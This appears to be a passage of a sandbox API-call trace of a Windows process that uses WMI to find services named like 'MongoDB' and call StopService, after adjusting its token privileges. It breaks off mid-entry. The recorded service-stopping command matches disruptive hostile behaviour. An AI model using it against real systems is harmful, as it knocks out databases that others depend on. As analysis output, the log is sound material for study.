[0257.277] lstrlenW (lpString="Win32_Service") returned 13 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0257.277] lstrlenW (lpString="-") returned 1 [0257.277] lstrlenW (lpString="Win32_Service") returned 13 [0257.277] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0257.277] lstrlenW (lpString="Win32_Service") returned 13 [0257.277] malloc (_Size=0x1c) returned 0x35cf00 [0257.277] lstrlenW (lpString="Win32_Service") returned 13 [0257.278] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0257.278] lstrlenW (lpString="Win32_Service") returned 13 [0257.278] malloc (_Size=0x1c) returned 0x357140 [0257.278] lstrlenW (lpString="Win32_Service") returned 13 [0257.278] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffd96370 | out: _String=0x0, _Context=0xffffffffffd96370) returned 0x0 [0257.278] lstrlenW (lpString="") returned 0 [0257.278] lstrlenW (lpString="WHERE") returned 5 [0257.278] lstrlenW (lpString="where") returned 5 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0257.278] lstrlenW (lpString="/") returned 1 [0257.278] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MongoDB%%'", cchCount1=23, lpString2="/", cchCount2=1) returned 3 [0257.278] lstrlenW (lpString="-") returned 1 [0257.278] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MongoDB%%'", cchCount1=23, lpString2="-", cchCount2=1) returned 3 [0257.278] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0257.278] malloc (_Size=0x30) returned 0x358680 [0257.278] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0257.278] lstrlenW (lpString="/") returned 1 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0257.278] lstrlenW (lpString="-") returned 1 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] malloc (_Size=0xa) returned 0x35cba0 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] lstrlenW (lpString="GET") returned 3 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0257.278] lstrlenW (lpString="LIST") returned 4 [0257.278] lstrlenW (lpString="call") returned 4 [0257.278] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0257.279] lstrlenW (lpString="SET") returned 3 [0257.279] lstrlenW (lpString="call") returned 4 [0257.279] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0257.279] lstrlenW (lpString="CREATE") returned 6 [0257.279] lstrlenW (lpString="call") returned 4 [0257.279] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0257.279] lstrlenW (lpString="CALL") returned 4 [0257.279] lstrlenW (lpString="call") returned 4 [0257.279] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0257.279] lstrlenW (lpString="/") returned 1 [0257.279] lstrlenW (lpString="stopservice") returned 11 [0257.279] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0257.279] lstrlenW (lpString="-") returned 1 [0257.279] lstrlenW (lpString="stopservice") returned 11 [0257.279] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0257.279] lstrlenW (lpString="stopservice") returned 11 [0257.279] malloc (_Size=0x18) returned 0x35cbc0 [0257.279] lstrlenW (lpString="stopservice") returned 11 [0257.279] ??0CHString@@QEAA@XZ () returned 0xed1f8 [0257.279] GetCurrentThreadId () returned 0x730 [0257.279] GetCurrentThreadId () returned 0x730 [0257.279] ??0CHString@@QEAA@XZ () returned 0xecfc8 [0257.279] malloc (_Size=0x8) returned 0x35cf60 [0257.279] malloc (_Size=0x18) returned 0x35cbe0 [0257.279] malloc (_Size=0x18) returned 0x35cc00 [0257.279] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ca1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc72950 | out: ppNamespace=0xffc72950*=0x1cb3a98) returned 0x0 [0257.296] free (_Block=0x35cc00) [0257.296] CoSetProxyBlanket (pProxy=0x1cb3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0257.296] free (_Block=0x35cf60) [0257.296] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.296] free (_Block=0x35cbe0) [0257.296] malloc (_Size=0x18) returned 0x35cbe0 [0257.296] IWbemServices:GetObject (in: This=0x1cb3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xed1d8*=0x0, ppCallResult=0x0 | out: ppObject=0xed1d8*=0x1cdbfa0, ppCallResult=0x0) returned 0x0 [0257.310] free (_Block=0x35cbe0) [0257.310] IWbemClassObject:BeginMethodEnumeration (This=0x1cdbfa0, lEnumFlags=0) returned 0x0 [0257.310] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="StartService", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.311] lstrlenW (lpString="StartService") returned 12 [0257.311] lstrlenW (lpString="stopservice") returned 11 [0257.311] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0257.311] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.311] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="StopService", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.311] lstrlenW (lpString="StopService") returned 11 [0257.311] lstrlenW (lpString="stopservice") returned 11 [0257.311] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0257.311] malloc (_Size=0x70) returned 0x35cf60 [0257.311] ??0CHString@@QEAA@XZ () returned 0xecb88 [0257.311] GetCurrentThreadId () returned 0x730 [0257.311] IWbemClassObject:GetNames (in: This=0x1cdc4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xecb80 | out: pNames=0xecb80*="\x01ƀ\x08") returned 0x0 [0257.311] SafeArrayGetLBound (in: psa=0x1e4af0, nDim=0x1, plLbound=0xecb98 | out: plLbound=0xecb98) returned 0x0 [0257.311] SafeArrayGetUBound (in: psa=0x1e4af0, nDim=0x1, plUbound=0xecb94 | out: plUbound=0xecb94) returned 0x0 [0257.311] SafeArrayGetElement (in: psa=0x1e4af0, rgIndices=0xecb74, pv=0xecb78 | out: pv=0xecb78) returned 0x0 [0257.311] malloc (_Size=0x48) returned 0x35cfe0 [0257.312] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1cdc4a0, wszProperty="ReturnValue", ppQualSet=0xec9c8 | out: ppQualSet=0xec9c8*=0x1ca13b0) returned 0x0 [0257.312] malloc (_Size=0x18) returned 0x35cbe0 [0257.312] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="CIMTYPE", lFlags=0, pVal=0xeca50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0xeca50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0257.312] free (_Block=0x35cbe0) [0257.312] malloc (_Size=0x18) returned 0x35cbe0 [0257.312] IWbemClassObject:Get (in: This=0x1cdc4a0, wszName="ReturnValue", lFlags=0, pVal=0xecaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xec9d8*=969248, plFlavor=0x0 | out: pVal=0xecaf8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xec9d8*=19, plFlavor=0x0) returned 0x0 [0257.312] malloc (_Size=0x18) returned 0x35cc00 [0257.312] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="read", lFlags=0, pVal=0xec9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc72ac0), plFlavor=0x0 | out: pVal=0xec9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc72ac0), plFlavor=0x0) returned 0x80041002 [0257.312] free (_Block=0x35cc00) [0257.312] malloc (_Size=0x18) returned 0x35cc00 [0257.312] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="write", lFlags=0, pVal=0xec9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc72ac0), plFlavor=0x0 | out: pVal=0xec9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffc72ac0), plFlavor=0x0) returned 0x80041002 [0257.312] free (_Block=0x35cc00) [0257.312] malloc (_Size=0x18) returned 0x35cc00 [0257.312] malloc (_Size=0x18) returned 0x35cc20 [0257.313] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="Description", lFlags=0, pVal=0xeca90*(varType=0x0, wReserved1=0xe, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc14293, varVal2=0xeca98), plFlavor=0x0 | out: pVal=0xeca90*(varType=0x0, wReserved1=0xe, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc14293, varVal2=0xeca98), plFlavor=0x0) returned 0x80041002 [0257.313] free (_Block=0x35cc20) [0257.313] malloc (_Size=0x18) returned 0x35cc20 [0257.313] lstrlenA (lpString="Not Available") returned 13 [0257.313] malloc (_Size=0x1c) returned 0x35d030 [0257.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc022f0, cbMultiByte=-1, lpWideCharStr=0x35d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0257.313] free (_Block=0x35d030) [0257.313] IUnknown:Release (This=0x1ca13b0) returned 0x0 [0257.313] malloc (_Size=0x48) returned 0x35d030 [0257.313] malloc (_Size=0x18) returned 0x35cc40 [0257.313] malloc (_Size=0x48) returned 0x35d080 [0257.313] malloc (_Size=0x70) returned 0x35d0d0 [0257.313] malloc (_Size=0x48) returned 0x35d150 [0257.313] free (_Block=0x35d080) [0257.313] free (_Block=0x35d030) [0257.313] free (_Block=0x35cfe0) [0257.313] free (_Block=0x35cc00) [0257.313] free (_Block=0x35cc20) [0257.313] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.313] IWbemClassObject:GetMethodQualifierSet (in: This=0x1cdbfa0, wszMethod="StopService", ppQualSet=0xed0f8 | out: ppQualSet=0xed0f8*=0x1ca13b0) returned 0x0 [0257.314] malloc (_Size=0x18) returned 0x35cc20 [0257.314] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="Implemented", lFlags=0, pVal=0xed108*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4167adf241, varVal2=0xffc144fb), plFlavor=0x0 | out: pVal=0xed108*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4167adf241, varVal2=0xffc144fb), plFlavor=0x0) returned 0x80041002 [0257.314] free (_Block=0x35cc20) [0257.314] malloc (_Size=0x18) returned 0x35cc20 [0257.314] malloc (_Size=0x18) returned 0x35cc00 [0257.314] IWbemQualifierSet:Get (in: This=0x1ca13b0, wszName="Description", lFlags=0, pVal=0xed120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc72948, varVal2=0x730), plFlavor=0x0 | out: pVal=0xed120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x730), plFlavor=0x0) returned 0x0 [0257.314] free (_Block=0x35cc00) [0257.314] malloc (_Size=0x18) returned 0x35cc00 [0257.314] IUnknown:Release (This=0x1ca13b0) returned 0x0 [0257.314] malloc (_Size=0x70) returned 0x35cfe0 [0257.314] malloc (_Size=0x70) returned 0x35d1a0 [0257.314] malloc (_Size=0x48) returned 0x35d060 [0257.314] malloc (_Size=0x18) returned 0x35cc60 [0257.314] malloc (_Size=0x70) returned 0x35d220 [0257.314] malloc (_Size=0x70) returned 0x35d2a0 [0257.314] malloc (_Size=0x48) returned 0x35d320 [0257.314] malloc (_Size=0x50) returned 0x35d370 [0257.314] malloc (_Size=0x70) returned 0x35d3d0 [0257.314] malloc (_Size=0x70) returned 0x35d450 [0257.314] malloc (_Size=0x48) returned 0x35d4d0 [0257.314] free (_Block=0x35d320) [0257.314] free (_Block=0x35d2a0) [0257.314] free (_Block=0x35d220) [0257.314] free (_Block=0x35d060) [0257.314] free (_Block=0x35d1a0) [0257.314] free (_Block=0x35cfe0) [0257.314] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.315] free (_Block=0x35d150) [0257.315] free (_Block=0x35d0d0) [0257.315] free (_Block=0x35cf60) [0257.315] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="PauseService", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.315] lstrlenW (lpString="PauseService") returned 12 [0257.315] lstrlenW (lpString="stopservice") returned 11 [0257.315] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0257.315] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.315] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="ResumeService", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.315] lstrlenW (lpString="ResumeService") returned 13 [0257.315] lstrlenW (lpString="stopservice") returned 11 [0257.315] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0257.315] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.315] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="InterrogateService", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.315] lstrlenW (lpString="InterrogateService") returned 18 [0257.315] lstrlenW (lpString="stopservice") returned 11 [0257.315] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0257.315] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.315] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="UserControlService", ppInSignature=0xed1c0*=0x1cdc520, ppOutSignature=0xed1c8*=0x1cdca20) returned 0x0 [0257.315] lstrlenW (lpString="UserControlService") returned 18 [0257.315] lstrlenW (lpString="stopservice") returned 11 [0257.315] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0257.315] IUnknown:Release (This=0x1cdc520) returned 0x0 [0257.315] IUnknown:Release (This=0x1cdca20) returned 0x0 [0257.315] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="Create", ppInSignature=0xed1c0*=0x1cde470, ppOutSignature=0xed1c8*=0x1cde970) returned 0x0 [0257.316] lstrlenW (lpString="Create") returned 6 [0257.316] lstrlenW (lpString="stopservice") returned 11 [0257.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0257.316] IUnknown:Release (This=0x1cde470) returned 0x0 [0257.316] IUnknown:Release (This=0x1cde970) returned 0x0 [0257.316] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="Change", ppInSignature=0xed1c0*=0x1cde1f0, ppOutSignature=0xed1c8*=0x1cde6f0) returned 0x0 [0257.316] lstrlenW (lpString="Change") returned 6 [0257.316] lstrlenW (lpString="stopservice") returned 11 [0257.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0257.316] IUnknown:Release (This=0x1cde1f0) returned 0x0 [0257.316] IUnknown:Release (This=0x1cde6f0) returned 0x0 [0257.316] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="ChangeStartMode", ppInSignature=0xed1c0*=0x1cdc610, ppOutSignature=0xed1c8*=0x1cdcb10) returned 0x0 [0257.316] lstrlenW (lpString="ChangeStartMode") returned 15 [0257.316] lstrlenW (lpString="stopservice") returned 11 [0257.316] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0257.316] IUnknown:Release (This=0x1cdc610) returned 0x0 [0257.316] IUnknown:Release (This=0x1cdcb10) returned 0x0 [0257.316] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="Delete", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc4a0) returned 0x0 [0257.316] lstrlenW (lpString="Delete") returned 6 [0257.317] lstrlenW (lpString="stopservice") returned 11 [0257.317] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0257.317] IUnknown:Release (This=0x1cdc4a0) returned 0x0 [0257.317] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="GetSecurityDescriptor", ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x1cdc640) returned 0x0 [0257.317] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0257.317] lstrlenW (lpString="stopservice") returned 11 [0257.317] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0257.317] IUnknown:Release (This=0x1cdc640) returned 0x0 [0257.317] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*="SetSecurityDescriptor", ppInSignature=0xed1c0*=0x1cdc520, ppOutSignature=0xed1c8*=0x1cdca20) returned 0x0 [0257.317] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0257.317] lstrlenW (lpString="stopservice") returned 11 [0257.317] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0257.317] IUnknown:Release (This=0x1cdc520) returned 0x0 [0257.317] IUnknown:Release (This=0x1cdca20) returned 0x0 [0257.317] IWbemClassObject:NextMethod (in: This=0x1cdbfa0, lFlags=0, pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0 | out: pstrName=0xed1b8*=0x0, ppInSignature=0xed1c0*=0x0, ppOutSignature=0xed1c8*=0x0) returned 0x40005 [0257.317] IUnknown:Release (This=0x1cdbfa0) returned 0x0 [0257.317] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0257.317] lstrlenW (lpString="SET") returned 3 [0257.317] lstrlenW (lpString="call") returned 4 [0257.317] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0257.317] lstrlenW (lpString="CREATE") returned 6 [0257.317] lstrlenW (lpString="call") returned 4 [0257.317] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0257.317] free (_Block=0x358640) [0257.317] malloc (_Size=0x8) returned 0x35cf60 [0257.318] lstrlenW (lpString="GET") returned 3 [0257.318] lstrlenW (lpString="call") returned 4 [0257.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0257.318] lstrlenW (lpString="LIST") returned 4 [0257.318] lstrlenW (lpString="call") returned 4 [0257.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0257.318] lstrlenW (lpString="ASSOC") returned 5 [0257.318] lstrlenW (lpString="call") returned 4 [0257.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0257.318] WbemLocator:IUnknown:AddRef (This=0x1ca1390) returned 0x3 [0257.318] free (_Block=0x356a50) [0257.318] lstrlenW (lpString="") returned 0 [0257.318] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.318] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0257.318] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.318] malloc (_Size=0x14) returned 0x35cc80 [0257.318] lstrlenW (lpString="XDUWTFONO") returned 9 [0257.318] GetCurrentThreadId () returned 0x730 [0257.318] GetCurrentProcess () returned 0xffffffffffffffff [0257.318] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xef500 | out: TokenHandle=0xef500*=0x298) returned 1 [0257.318] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xef4f8 | out: TokenInformation=0x0, ReturnLength=0xef4f8) returned 0 [0257.318] malloc (_Size=0x118) returned 0x35cf80 [0257.318] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x35cf80, TokenInformationLength=0x118, ReturnLength=0xef4f8 | out: TokenInformation=0x35cf80, ReturnLength=0xef4f8) returned 1 [0257.318] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x35cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1815708330, Attributes=0xf12a), (Luid.LowPart=0x0, Luid.HighPart=3500624, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=3473752, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000f137), (Luid.LowPart=0x0, Luid.HighPart=3526496, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0257.318] free (_Block=0x35cf80) [0257.318] CloseHandle (hObject=0x298) returned 1 [0257.318] lstrlenW (lpString="GET") returned 3 [0257.318] lstrlenW (lpString="call") returned 4 [0257.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0257.319] lstrlenW (lpString="LIST") returned 4 [0257.319] lstrlenW (lpString="call") returned 4 [0257.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0257.319] lstrlenW (lpString="SET") returned 3 [0257.319] lstrlenW (lpString="call") returned 4 [0257.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0257.319] lstrlenW (lpString="CALL") returned 4 [0257.319] lstrlenW (lpString="call") returned 4 [0257.319] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0257.319] ??0CHString@@QEAA@XZ () returned 0xef4b0 [0257.319] GetCurrentThreadId () returned 0x730 [0257.319] malloc (_Size=0x18) returned 0x35cca0 [0257.319] malloc (_Size=0x18) returned 0x35ccc0 [0257.319] malloc (_Size=0x18) returned 0x35cce0 [0257.319] malloc (_Size=0x18) returned 0x35cd00 [0257.319] malloc (_Size=0x18) returned 0x35d550 [0257.319] SysStringLen (param_1="\\\\") returned 0x2 [0257.319] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0257.319] malloc (_Size=0x18) returned 0x35d570 [0257.319] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0257.319] SysStringLen (param_1="\\") returned 0x1 [0257.320] malloc 